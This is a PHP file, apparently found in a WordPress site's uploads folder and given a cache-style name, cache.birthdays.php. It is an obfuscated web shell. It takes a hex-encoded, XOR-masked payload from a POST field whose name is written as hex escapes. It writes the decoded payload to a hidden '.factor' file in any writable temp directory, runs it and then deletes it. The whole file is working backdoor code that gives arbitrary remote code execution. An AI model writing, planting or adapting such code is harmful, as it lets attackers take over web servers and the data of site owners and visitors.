File: /home/casinobe/domains/pug555-a.com/public_html/wp-content/uploads/wpcode/b/b/f/cache.birthdays.php
<?php
if(array_key_exists("\x65\x6E\x74ity", $_POST)){
$value = array_filter([session_save_path(), "/dev/shm", "/var/tmp", sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp", getenv("TMP"), ini_get("upload_tmp_dir")]);
$binding = hex2bin($_POST["\x65\x6E\x74ity"]);
$ref ='' ;foreach(str_split($binding) as $char){$ref .= chr(ord($char) ^ 25);}
$token = 0;
do {
$bind = $value[$token] ?? null;
if ($token >= count($value)) break;
if (is_dir($bind) ? is_writable($bind) : false) {
$data = sprintf("%s/.factor", $bind);
if (@file_put_contents($data, $ref) !== false) {
include $data;
unlink($data);
die();
}
}
$token++;
} while (true);
}